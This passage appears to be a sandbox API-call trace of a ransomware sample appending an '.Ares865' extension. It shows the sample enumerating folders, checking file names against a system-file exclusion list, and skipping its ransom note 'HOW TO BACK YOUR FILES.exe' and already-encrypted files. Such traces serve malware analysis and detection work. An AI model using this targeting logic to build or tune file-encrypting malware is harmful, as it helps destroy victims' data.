(lpString1="maintenanceservice-install.log.Ares865", lpString2="bootmgr") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="temp") returned -1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="pagefile.sys") returned -1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="boot") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="ids.txt") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="ntuser.dat") returned -1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="perflogs") returned -1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="MSBuild") returned -1 [0091.004] lstrlenW (lpString="maintenanceservice-install.log.Ares865") returned 38 [0091.004] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Mozilla\\logs\\*") returned 203 [0091.004] lstrcpyW (in: lpString1=0x2cce594, lpString2="maintenanceservice-install.log.Ares865" | out: lpString1="maintenanceservice-install.log.Ares865") returned="maintenanceservice-install.log.Ares865" [0091.004] lstrlenW (lpString="maintenanceservice-install.log.Ares865") returned 38 [0091.004] lstrlenW (lpString="Ares865") returned 7 [0091.004] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.004] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x632b4320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log.Ares865", cAlternateFileName="MAINTE~1.ARE")) returned 0 [0091.004] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.004] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0091.005] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.005] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.005] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.005] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x635adea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635adea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.005] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.005] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.005] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.005] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.005] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c315d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.005] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.005] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x632da480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn.Ares865", cAlternateFileName="HXHXN~1.ARE")) returned 1 [0091.005] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.005] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0091.005] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2=".") returned 1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="..") returned 1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="windows") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="bootmgr") returned 1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="temp") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="pagefile.sys") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="boot") returned 1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="ids.txt") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="ntuser.dat") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="perflogs") returned -1 [0091.006] lstrcmpiW (lpString1="Hx.hxn.Ares865", lpString2="MSBuild") returned -1 [0091.006] lstrlenW (lpString="Hx.hxn.Ares865") returned 14 [0091.006] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft Help\\*") returned 205 [0091.006] lstrcpyW (in: lpString1=0x2cce598, lpString2="Hx.hxn.Ares865" | out: lpString1="Hx.hxn.Ares865") returned="Hx.hxn.Ares865" [0091.006] lstrlenW (lpString="Hx.hxn.Ares865") returned 14 [0091.006] lstrlenW (lpString="Ares865") returned 7 [0091.006] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.006] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63326740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn.Ares865", cAlternateFileName="MSEXCE~1.ARE")) returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2=".") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="..") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="windows") returned -1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="bootmgr") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="temp") returned -1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="pagefile.sys") returned -1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="boot") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="ids.txt") returned 1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="ntuser.dat") returned -1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="perflogs") returned -1 [0091.006] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn.Ares865", lpString2="MSBuild") returned -1 [0091.006] lstrlenW (lpString="MS.EXCEL.14.1033.hxn.Ares865") returned 28 [0091.006] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft Help\\Hx.hxn.Ares865") returned 218 [0091.006] lstrcpyW (in: lpString1=0x2cce598, lpString2="MS.EXCEL.14.1033.hxn.Ares865" | out: lpString1="MS.EXCEL.14.1033.hxn.Ares865") returned="MS.EXCEL.14.1033.hxn.Ares865" [0091.006] lstrlenW (lpString="MS.EXCEL.14.1033.hxn.Ares865") returned 28 [0091.006] lstrlenW (lpString="Ares865") returned 7 [0091.006] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.006] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63326740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn.Ares865", cAlternateFileName="MSEXCE~2.ARE")) returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="aoldtz.exe") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2=".") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="..") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="windows") returned -1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="bootmgr") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="temp") returned -1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="pagefile.sys") returned -1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="boot") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="ids.txt") returned 1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="ntuser.dat") returned -1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="perflogs") returned -1 [0091.007] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn.Ares865", lpString2="MSBuild") returned -1 [0091.007] lstrlenW (lpString="MS.EXCEL.DEV.14.1033.hxn.Ares865") returned 32 [0091.007] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft Help\\MS.EXCEL.14.1033.hxn.Ares865") returned 232 [0091.007] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.007] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e77d0 [0091.007] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.007] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.007] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.007] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.008] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.008] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.008] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.008] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.008] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="aoldtz.exe") returned 1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2=".") returned 1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="..") returned 1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="windows") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="bootmgr") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="temp") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="pagefile.sys") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="boot") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="ids.txt") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="ntuser.dat") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="perflogs") returned -1 [0091.008] lstrcmpiW (lpString1="Assistance", lpString2="MSBuild") returned -1 [0091.008] lstrlenW (lpString="Assistance") returned 10 [0091.008] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*") returned 200 [0091.008] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Assistance" | out: lpString1="Assistance") returned="Assistance" [0091.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0091.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a4) returned 0x32cfc8 [0091.008] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0091.008] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="aoldtz.exe") returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="windows") returned -1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="bootmgr") returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="temp") returned -1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="pagefile.sys") returned -1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="boot") returned 1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="ids.txt") returned -1 [0091.008] lstrcmpiW (lpString1="Crypto", lpString2="ntuser.dat") returned -1 [0091.009] lstrcmpiW (lpString1="Crypto", lpString2="perflogs") returned -1 [0091.009] lstrcmpiW (lpString1="Crypto", lpString2="MSBuild") returned -1 [0091.009] lstrlenW (lpString="Crypto") returned 6 [0091.009] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Assistance") returned 209 [0091.009] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Crypto" | out: lpString1="Crypto") returned="Crypto" [0091.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0091.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19c) returned 0x331170 [0091.009] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0091.009] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="aoldtz.exe") returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2=".") returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="..") returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="windows") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="bootmgr") returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="temp") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="pagefile.sys") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="boot") returned 1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="ids.txt") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="ntuser.dat") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="perflogs") returned -1 [0091.009] lstrcmpiW (lpString1="Device Stage", lpString2="MSBuild") returned -1 [0091.009] lstrlenW (lpString="Device Stage") returned 12 [0091.009] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Crypto") returned 205 [0091.009] lstrcpyW (in: lpString1=0x2cce58e, lpString2="Device Stage" | out: lpString1="Device Stage") returned="Device Stage" [0091.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0091.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a8) returned 0x32d180 [0091.009] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0091.009] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="aoldtz.exe") returned 1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2=".") returned 1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="..") returned 1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="windows") returned -1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="bootmgr") returned 1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="temp") returned -1 [0091.009] lstrcmpiW (lpString1="DeviceSync", lpString2="pagefile.sys") returned -1 [0091.010] lstrcmpiW (lpString1="DeviceSync", lpString2="boot") returned 1 [0091.010] lstrcmpiW (lpString1="DeviceSync", lpString2="ids.txt") returned -1 [0091.010] lstrcmpiW (lpString1="DeviceSync", lpString2="ntuser.dat") returned -1 [0091.010] lstrcmpiW (lpString1="DeviceSync", lpString2="perflogs") returned -1 [0091.010] lstrcmpiW (lpString1="DeviceSync", lpString2="MSBuild") returned -1 [0091.010] lstrlenW (lpString="DeviceSync") returned 10 [0091.010] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Device Stage") returned 211 [0091.010] lstrcpyW (in: lpString1=0x2cce58e, lpString2="DeviceSync" | out: lpString1="DeviceSync") returned="DeviceSync" [0091.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0091.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a4) returned 0x32d338 [0091.010] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0091.010] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="aoldtz.exe") returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2=".") returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="..") returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="windows") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="bootmgr") returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="temp") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="pagefile.sys") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="boot") returned 1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="ids.txt") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="ntuser.dat") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="perflogs") returned -1 [0091.010] lstrcmpiW (lpString1="DRM", lpString2="MSBuild") returned -1 [0091.010] lstrlenW (lpString="DRM") returned 3 [0091.010] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\DeviceSync") returned 209 [0091.010] lstrcpyW (in: lpString1=0x2cce58e, lpString2="DRM" | out: lpString1="DRM") returned="DRM" [0091.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0091.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x196) returned 0x2d6cf0 [0091.010] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0091.010] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eHome", cAlternateFileName="")) returned 1 [0091.010] lstrcmpiW (lpString1="eHome", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.010] lstrcmpiW (lpString1="eHome", lpString2="aoldtz.exe") returned 1 [0091.010] lstrcmpiW (lpString1="eHome", lpString2=".") returned 1 [0091.010] lstrcmpiW (lpString1="eHome", lpString2="..") returned 1 [0091.010] lstrcmpiW (lpString1="eHome", lpString2="windows") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="bootmgr") returned 1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="temp") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="pagefile.sys") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="boot") returned 1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="ids.txt") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="ntuser.dat") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="perflogs") returned -1 [0091.011] lstrcmpiW (lpString1="eHome", lpString2="MSBuild") returned -1 [0091.011] lstrlenW (lpString="eHome") returned 5 [0091.011] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\DRM") returned 202 [0091.011] lstrcpyW (in: lpString1=0x2cce58e, lpString2="eHome" | out: lpString1="eHome") returned="eHome" [0091.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0091.011] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19a) returned 0x331318 [0091.011] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0091.011] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Event Viewer", cAlternateFileName="EVENTV~1")) returned 1 [0091.011] 